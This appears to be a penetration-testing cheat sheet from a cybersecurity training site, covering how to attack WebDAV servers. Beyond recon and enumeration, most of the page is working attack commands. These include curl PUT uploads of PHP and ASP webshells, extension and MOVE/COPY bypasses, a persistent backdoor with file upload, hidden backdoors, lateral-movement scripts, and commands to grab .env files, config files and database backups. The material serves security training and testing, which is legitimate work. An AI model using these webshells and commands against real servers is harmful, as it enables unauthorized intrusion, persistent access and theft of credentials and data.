Skip to main content

Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Start Practicing Now

WebDAV (Web Distributed Authoring and Versioning)

Default Ports: 80 (HTTP), 443 (HTTPS)

WebDAV is an extension of HTTP that allows clients to perform remote web content authoring operations. It enables users to collaboratively edit and manage files on remote web servers. WebDAV adds methods like PUT, DELETE, PROPFIND, and others to the standard HTTP methods. Common implementations include Microsoft IIS WebDAV, Apache mod_dav, and various cloud storage solutions. Misconfigurations can lead to file upload vulnerabilities and unauthorized access.

Connect

Using cadaver (WebDAV client)

# Connect to WebDAV server
cadaver http://target.com/webdav/

# With authentication
cadaver http://target.com/webdav/
Username: admin
Password: password

# HTTPS connection
cadaver https://target.com/webdav/

# Once connected, use DAV commands:
dav:/webdav/> ls
dav:/webdav/> put localfile.txt
dav:/webdav/> get remotefile.txt
dav:/webdav/> delete file.txt

Using cURL

# List directory (PROPFIND)
curl -X PROPFIND http://target.com/webdav/ -u username:password

# Upload file (PUT)
curl -X PUT http://target.com/webdav/file.txt -u username:password -d @localfile.txt

# Download file (GET)
curl http://target.com/webdav/file.txt -u username:password -o file.txt

# Delete file (DELETE)
curl -X DELETE http://target.com/webdav/file.txt -u username:password

# Create directory (MKCOL)
curl -X MKCOL http://target.com/webdav/newdir/ -u username:password

Mount as Network Drive

# Linux - mount WebDAV
mount -t davfs http://target.com/webdav/ /mnt/webdav
# Or
davfs2 http://target.com/webdav/ /mnt/webdav

# Windows - map network drive
net use Z: http://target.com/webdav/ /user:username password

# macOS - mount WebDAV
mount_webdav http://target.com/webdav/ /Volumes/webdav

Recon

Service Detection with Nmap

Use Nmap to detect WebDAV services and identify server capabilities.

nmap -p 80,443 target.com

Connect to WebDAV services to gather version and service information.

Using curl

# Test with curl
curl -X OPTIONS http://target.com/webdav/ -v

# Check for DAV header
# DAV: 1, 2
# DAV: <http://apache.org/dav/propset/fs/1>

Using nmap

# HTTP methods enumeration
nmap -p 80,443 --script http-methods target.com
nmap -p 80,443 --script http-webdav-scan target.com

# WebDAV path detection
nmap -p 80 --script http-webdav-scan --script-args http-webdav-scan.path=/webdav/ target.com

WebDAV Path Discovery

Discover common WebDAV paths and endpoints.

# Common paths
/webdav/
/dav/
/WebDAV/
/uploads/
/files/
/_vti_bin/
/sharepoint/

Enumeration

Use various tools for detailed WebDAV enumeration and information gathering.

HTTP Methods Enumeration

Identify which WebDAV methods are enabled to determine attack surface.

# Using curl OPTIONS
curl -X OPTIONS http://target.com/webdav/ -v

# Look for methods in Allow header:
# Allow: OPTIONS, GET, HEAD, POST, DELETE, TRACE, PROPFIND, PROPPATCH, COPY, MOVE, LOCK, UNLOCK, PUT

# Using davtest
davtest -url http://target.com/webdav/ -auth username:password

# Test specific method
curl -X PROPFIND http://target.com/webdav/ -u username:password

Directory Listing

Enumerate directory contents and file properties using PROPFIND method.

# Using PROPFIND method
curl -X PROPFIND http://target.com/webdav/ \
-u username:password \
-H "Depth: 1"

# Recursive listing
curl -X PROPFIND http://target.com/webdav/ \
-u username:password \
-H "Depth: infinity"

# Using cadaver
cadaver http://target.com/webdav/
dav:/webdav/> ls -la

Attack Vectors

Exploit various WebDAV vulnerabilities and misconfigurations for unauthorized access.

Authentication Bypass

Test for WebDAV authentication bypass vulnerabilities.

# Try without credentials
curl -X OPTIONS http://target.com/webdav/
curl -X PROPFIND http://target.com/webdav/

# Try with default credentials
admin:admin
admin:password
webdav:webdav

# Test authentication
curl -X PROPFIND http://target.com/webdav/ -u admin:admin

File Upload (PUT Method)

Upload malicious files using WebDAV PUT method.

# Upload PHP webshell
curl -X PUT http://target.com/webdav/shell.php \
-u username:password \
-d '<?php system($_GET["cmd"]); ?>'

# Access shell
curl http://target.com/webdav/shell.php?cmd=whoami

# Upload ASP webshell
curl -X PUT http://target.com/webdav/shell.asp \
-u username:password \
-d '<%=CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()%>'

# Upload other file types
curl -X PUT http://target.com/webdav/shell.txt \
-u username:password \
--data-binary @shell.php

Extension Bypass

Bypass file extension restrictions for webshell upload.

# Try various extensions
shell.php
shell.php.txt
shell.txt
shell.phtml
shell.php5
shell.php7

# Upload with different Content-Type
curl -X PUT http://target.com/webdav/shell.php \
-H "Content-Type: image/jpeg" \
-u username:password \
-d '<?php system($_GET["cmd"]); ?>'

MOVE/COPY Method Exploitation

Use MOVE/COPY methods to bypass file restrictions.

# Upload as .txt, then MOVE to .php
curl -X PUT http://target.com/webdav/shell.txt \
-u username:password \
-d '<?php system($_GET["cmd"]); ?>'

curl -X MOVE http://target.com/webdav/shell.txt \
-u username:password \
-H "Destination: http://target.com/webdav/shell.php"

# Or COPY
curl -X COPY http://target.com/webdav/legit.txt \
-u username:password \
-H "Destination: http://target.com/webdav/backdoor.php"

Post-Exploitation

Extract sensitive data and establish persistent access after successful WebDAV exploitation.

Backdoor Upload

Upload persistent webshells for long-term access.

# Upload persistent webshell
cat > advanced_shell.php << 'EOF'
<?php
if(isset($_REQUEST['cmd'])){
system($_REQUEST['cmd']);
}
if(isset($_FILES['file'])){
move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
}
?>
EOF

curl -X PUT http://target.com/webdav/system.php \
-u username:password \
--data-binary @advanced_shell.php

Data Exfiltration

Extract sensitive data from compromised WebDAV servers.

# Download all files
cadaver http://target.com/webdav/
dav:/webdav/> mget *

# Using wget
wget -r --user=username --password=password http://target.com/webdav/

# Specific sensitive files
curl http://target.com/webdav/config.php -u username:password -o config.php
curl http://target.com/webdav/.env -u username:password -o .env

Persistence

Create persistent backdoor access to compromised WebDAV systems.

# Upload multiple backdoors
curl -X PUT http://target.com/webdav/backup.php \
-u username:password \
-d '<?php system($_GET["c"]); ?>'

# Upload to different directories
curl -X PUT http://target.com/webdav/uploads/shell.php \
-u username:password \
-d '<?php system($_GET["cmd"]); ?>'

# Create hidden backdoor
curl -X PUT http://target.com/webdav/.htaccess \
-u username:password \
-d '<?php system($_GET["cmd"]); ?>'

Lateral Movement

Expand access to other systems using WebDAV access.

# Upload network scanning script
curl -X PUT http://target.com/webdav/scan.php \
-u username:password \
-d '<?php system("nmap -sn 192.168.1.0/24"); ?>'

# Execute via webshell
curl "http://target.com/webdav/scan.php"

# Upload credential harvesting script
curl -X PUT http://target.com/webdav/creds.php \
-u username:password \
-d '<?php system("cat /etc/passwd"); ?>'

Credential Harvesting

Extract credentials and sensitive information from WebDAV systems.

# Download configuration files
curl http://target.com/webdav/config/database.php -u username:password -o db_config.php
curl http://target.com/webdav/.env -u username:password -o env_file

# Search for sensitive files
curl -X PROPFIND http://target.com/webdav/ \
-u username:password \
-H "Depth: infinity" | grep -i "password\|secret\|key"

# Download backup files
curl http://target.com/webdav/backup.sql -u username:password -o backup.sql
curl http://target.com/webdav/database.sql -u username:password -o database.sql

WebDAV HTTP Methods

MethodDescriptionSecurity Impact
OPTIONSGet allowed methodsInformation disclosure
PROPFINDGet propertiesDirectory listing
PROPPATCHModify propertiesMetadata modification
MKCOLCreate collectionDirectory creation
COPYCopy resourceFile duplication
MOVEMove resourceFile renaming/moving
LOCKLock resourceAccess control
UNLOCKUnlock resourceLock bypass
PUTUpload fileFile upload vulnerability
DELETEDelete fileFile deletion

Useful Tools

ToolDescriptionPrimary Use Case
cadaverWebDAV clientInteractive access
davtestWebDAV testerUpload testing
curlHTTP clientMethod testing
NmapNetwork scannerService detection
Burp SuiteWeb proxyRequest manipulation

Security Misconfigurations

  • ❌ No authentication required
  • ❌ Weak credentials
  • ❌ PUT method enabled
  • ❌ DELETE method enabled
  • ❌ No file type restrictions
  • ❌ Writable webroot
  • ❌ No SSL/TLS encryption
  • ❌ Directory listing enabled
  • ❌ No upload size limits
  • ❌ Verbose error messages